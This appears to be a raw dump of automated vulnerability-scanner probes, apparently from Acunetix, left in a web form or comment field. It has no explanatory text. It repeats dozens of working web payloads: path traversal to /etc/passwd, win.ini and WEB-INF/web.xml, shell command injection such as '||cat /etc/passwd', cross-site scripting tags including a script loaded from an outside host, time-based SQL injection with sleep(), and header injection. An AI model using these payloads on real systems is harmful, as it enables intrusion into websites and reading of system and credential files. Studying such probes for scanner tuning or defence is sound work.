1

1

"

1

1

"

1

1

1

-1

/etc/passwd

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

http://hitgWr3UmoP7a.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1

1

1

comments

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

&dir

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

-1))

1

1

1

http://www.acunetix.tst

'&dir&'

1

comments/.

'"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1'"()&%<ScRiPt >prompt(961532)</ScRiPt>

Nm8PczVF'

1

1

"&dir&"

1

1

<!--

'"()&%<ScRiPt >prompt(904966)</ScRiPt>

1

1

vWHzGYWu')

|dir

1

1

1_959478

arLfjeHZ'))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

'|dir

1

1

1

1

"|dir

1

1

file:///etc/passwd

1

1

acu4986\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4986

1

/\../\../\../\../\../\../\../etc/passwd

1

1

acux1914\xc0\xbez1\xc0\xbcz2a\x90bcxuca1914

1

WEB-INF/web.xml

1

1

1<ScRiPt >prompt(900581)</ScRiPt>

1

1

1

1<script>prompt(988632)</script>

WEB-INF\web.xml

1

1

1

1<ScRiPt >prompt(977486)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945426></ScRiPt>

1

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(900461)</ScRiPt>

1

response.write(9961583*9066468)

1

../../../../../../../../../../windows/win.ini.jpg

1<video><source onerror="javascript:prompt(983590)">

1

1

1

&cat /etc/passwd&

'+response.write(9961583*9066468)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903777)"></g></svg>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

'&cat /etc/passwd&'

"+response.write(9961583*9066468)+"

1<div style=width:expression(prompt(962050))>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

"&cat /etc/passwd&"

................windowswin.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1<body onload=prompt(949675)>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

..\..\..\..\..\..\..\..\windows\win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

`cat /etc/passwd`

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(937053)>

${99984+100224}

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(950219)>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1some_inexistent_file_with_long_name%00.jpg

1&n926121=v943487

1<img/src=">" onerror=alert(990566)>

'|'ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(926294)</sCripT>

1

"|"ld

testasp.vulnweb.com

1

!(()&&!|*|*|

iCmXSLU5'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

WEB-INF/web.xml

'"()

1

1

zgDYwLiD')

^(#$!@#$)(()))******

1

WEB-INF\web.xml

'

'

\xf6<img acu onmouseover=prompt(972093) //\xf6>

/etc/passwd

1

1

1

AXKi59ID'))

1

1

"

1<input autofocus onfocus=prompt(975067)>

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

-1

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

||cat /etc/passwd

1

-1)

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

[url=http://www.acunetix.com]website security[/url]

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://hit3YCVCi4kIA.bxss.me/

&dir

1

1

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1_baz9f <ScRiPt >prompt(934685)</ScRiPt>

comments

1

1

1

'&dir&'

1

1

1

m7Co8wF0'

file:///etc/passwd

1'"()&%<ScRiPt >prompt(924042)</ScRiPt>

'"

http://www.acunetix.tst

1

1

"&dir&"

1

7ifm9n3b')

/\../\../\../\../\../\../\../etc/passwd

comments

'"()&%<ScRiPt >prompt(919645)</ScRiPt>

<!--

1

1

1

1

|dir

BTII8lch'))

WEB-INF/web.xml

comments/.

1

1_955735

1

1

1

'|dir

1

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

"|dir

1

../../../../../../../../../../boot.ini

acu4730\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4730

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux2436\xc0\xbez1\xc0\xbcz2a\x90bcxuca2436

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(917387)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(917383)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(931512)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994633></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(965337)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(958780)">

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(962323)"></g></svg>

1

1

1<div style=width:expression(prompt(945266))>

1

1

WEB-INF/web.xml

response.write(9913377*9390041)

1<iframe src='data:text/html

1

1

1

1

'+response.write(9913377*9390041)+'

1<body onload=prompt(995952)>

WEB-INF\web.xml

1

"+response.write(9913377*9390041)+"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(999664)>

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

&cat /etc/passwd&

1

1<img src=xyz OnErRor=prompt(929956)>

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(904482)>

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt%20>prompt(902925)</sCripT>

"&cat /etc/passwd&"

1

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

1&lt

1

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100188+99363}

1

`cat /etc/passwd`

\xf6<img acu onmouseover=prompt(936724) //\xf6>

1

-1)

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<input autofocus onfocus=prompt(940693)>

-1))

1

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1

1&n902651=v934068

1

1

<a href='http://www.acunetix.com'>website security</a>

1

)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

6wxjwuiB'

'|'ld

1

1

1

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

8TomtyU5')

/etc/passwd

testasp.vulnweb.com

"|"ld

1

1

^(#$!@#$)(()))******

3dz84t5E'))

1_K5FEY <ScRiPt >prompt(944598)</ScRiPt>

'"()

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1

1

"

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

-1)

1

1

1

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

1

1

http://hitJHbWOaewLf.bxss.me/

-1))

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

http://www.acunetix.tst

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

GG5jc4mh'

1

1

1

file:///etc/passwd

&dir

comments

'"

1

MFmEJTdz')

1'"()&%<ScRiPt >prompt(989086)</ScRiPt>

1

1

1

PkTXM6Oo'))

<!--

/\../\../\../\../\../\../\../etc/passwd

comments

'"()&%<ScRiPt >prompt(940213)</ScRiPt>

'&dir&'

1

1

1

WEB-INF/web.xml

1_968934

1

comments/.

1

"&dir&"

1

1

1

WEB-INF\web.xml

1

1

|dir

../../../../../../../../../../windows/win.ini

1

1

acu6628\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6628

1

'|dir

../../../../../../../../../../boot.ini

1

1

1

"|dir

acux10145\xc0\xbez1\xc0\xbcz2a\x90bcxuca10145

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(993967)</ScRiPt>

1

1

1

1<script>prompt(980367)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(932820)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?924717></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(934247)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(989597)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(985272)"></g></svg>

1

1

response.write(9420993*9509668)

&cat /etc/passwd&

1

1<div style=width:expression(prompt(905239))>

WEB-INF/web.xml

1

1

'+response.write(9420993*9509668)+'

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

"+response.write(9420993*9509668)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<body onload=prompt(972800)>

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(915362)>

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<img src=xyz OnErRor=prompt(918364)>

`cat /etc/passwd`

1

-1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

${99470+99668}

1<img/src=">" onerror=alert(924857)>

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1

1&n979097=v951022

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

'|'ld

1

1<ScRiPt%20>prompt(915038)</sCripT>

)

-1))

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"|"ld

1

!(()&&!|*|*|

1&lt

H4OAUBTM'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

9V1Zmz67')

'"()

1

^(#$!@#$)(()))******

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(950954) //\xf6>

QvoiwXXo'))

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

'

1

1

1

1<input autofocus onfocus=prompt(932887)>

1

-1

"

/etc/passwd

1

1

"

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

-1)

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

||cat /etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

[url=http://www.acunetix.com]website security[/url]

-1))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://hit93pC1BKC5F.bxss.me/

acunetix_wvs_invalid_filename

1

1

1_p5Z6r <ScRiPt >prompt(951991)</ScRiPt>

bZlbdf8v'

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

OFCEVcWm')

1

1

'&dir&'

comments

1

1

http://www.acunetix.tst

1

8PvJ4BWD'))

'"

comments/.

1

file:///etc/passwd

<!--

1'"()&%<ScRiPt >prompt(946335)</ScRiPt>

1

"&dir&"

1

1

1

1

1

1

1

'"()&%<ScRiPt >prompt(921785)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

1

1_943888

1

WEB-INF/web.xml

'|dir

1

1

WEB-INF\web.xml

"|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

acu3076\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3076

1

../../../../../../../../../../boot.ini

1

1

1

acux9981\xc0\xbez1\xc0\xbcz2a\x90bcxuca9981

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt >prompt(961323)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(931444)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(927711)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917277></ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(982883)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(990126)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9528245*9884212)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(976782)"></g></svg>

1

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(957950))>

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9528245*9884212)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'&cat /etc/passwd&'

1<iframe src='data:text/html

1

1

1

1

"+response.write(9528245*9884212)+"

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(937445)>

"&cat /etc/passwd&"

1

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968165)>

cat /etc/passwd

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

1<img src=xyz OnErRor=prompt(907588)>

1

1

`cat /etc/passwd`

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(992383)>

1

${99573+99904}

1

1

|cat /etc/passwd#

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt%20>prompt(978121)</sCripT>

1

1&n913597=v918558

1

1

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

-1)

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

"|"ld

1

\xf6<img acu onmouseover=prompt(909961) //\xf6>

^(#$!@#$)(()))******

testasp.vulnweb.com

1

'"()

1<input autofocus onfocus=prompt(994348)>

9h0z4rYw'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

ZUyv6nSf')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

"

1

1

[url=http://www.acunetix.com]website security[/url]

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

3r8j2Ee0'))

1

${@print(md5(acunetix_wvs_security_test))}

1

1_skZaV <ScRiPt >prompt(945227)</ScRiPt>

"

1

1

1

http://hitq3NXgfvIBA.bxss.me/

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

1

-1)

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

-1))

1

http://www.acunetix.tst

'&dir&'

'"

1

1

1

comments/.

ZPhWa8qR'

<!--

1

DZmZs1d3')

1

1'"()&%<ScRiPt >prompt(936681)</ScRiPt>

1

file:///etc/passwd

1

THPJryrp'))

"&dir&"

1

1

'"()&%<ScRiPt >prompt(973346)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

|dir

1

1

1_934751

1

WEB-INF/web.xml

'|dir

1

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

acu3905\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3905

1

../../../../../../../../../../windows/win.ini

acux2232\xc0\xbez1\xc0\xbcz2a\x90bcxuca2232

1

1

1<ScRiPt >prompt(984244)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1<script>prompt(963942)</script>

1

1

1<ScRiPt >prompt(932236)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?946735></ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(962038)</ScRiPt>

1

1

................windowswin.ini

1

1<video><source onerror="javascript:prompt(981901)">

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(955617)"></g></svg>

1

1

1

response.write(9396870*9987172)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<div style=width:expression(prompt(942515))>

1

1

'+response.write(9396870*9987172)+'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<iframe src='data:text/html

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9396870*9987172)+"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<body onload=prompt(956547)>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918563)>

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF/web.xml

1<img src=xyz OnErRor=prompt(917799)>

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

cat /etc/passwd

1

1<img/src=">" onerror=alert(924266)>

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99546+100072}

1

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1<ScRiPt%20>prompt(960723)</sCripT>

1&n912015=v946235

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

|cat /etc/passwd#

1&lt

1

1some_inexistent_file_with_long_name%00.jpg

1

)

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

\xf6<img acu onmouseover=prompt(958865) //\xf6>

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

^(#$!@#$)(()))******

1

'

1<input autofocus onfocus=prompt(995307)>

'"()

1

"|"ld

testasp.vulnweb.com

1

-1)

/etc/passwd

"

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

1

'

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

a9Wgg8MF'

1

1_ITrSK <ScRiPt >prompt(920439)</ScRiPt>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

1

1

http://hitwnmHGj32Z6.bxss.me/

FiEKOD3A')

1

1

1

1

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

YrE6kM5E'))

1

&dir

1

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

-1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'&dir&'

http://www.acunetix.tst

1

1

comments

-1)

'"

1

1'"()&%<ScRiPt >prompt(905722)</ScRiPt>

WEB-INF/web.xml

"&dir&"

1

comments/.

1

<!--

1

-1))

'"()&%<ScRiPt >prompt(917005)</ScRiPt>

|dir

WEB-INF\web.xml

1

1

1

1

yFz2obO6'

1_956483

../../../../../../../../../../windows/win.ini

'|dir

1

1

1

ZZbyGvEN')

1

../../../../../../../../../../boot.ini

1

"|dir

ixZd4WWW'))

1

acu1640\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1640

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

acux3845\xc0\xbez1\xc0\xbcz2a\x90bcxuca3845

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(961928)</ScRiPt>

1

................windowswin.ini

1

1<script>prompt(979312)</script>

1

1<ScRiPt >prompt(914117)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945864></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(998651)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(941623)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9488033*9368747)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988809)"></g></svg>

1

1

'+response.write(9488033*9368747)+'

1

1

1<div style=width:expression(prompt(926540))>

WEB-INF/web.xml

1

&cat /etc/passwd&

1

"+response.write(9488033*9368747)+"

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(901407)>

'&cat /etc/passwd&'

WEB-INF\web.xml

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966678)>

"&cat /etc/passwd&"

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

cat /etc/passwd

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(929788)>

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

1

1<img/src=">" onerror=alert(983132)>

1

1

-1

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

1

1

${100327+99964}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt%20>prompt(967400)</sCripT>

1

1

-1)

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n982733=v922452

1&lt

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1

-1))

)

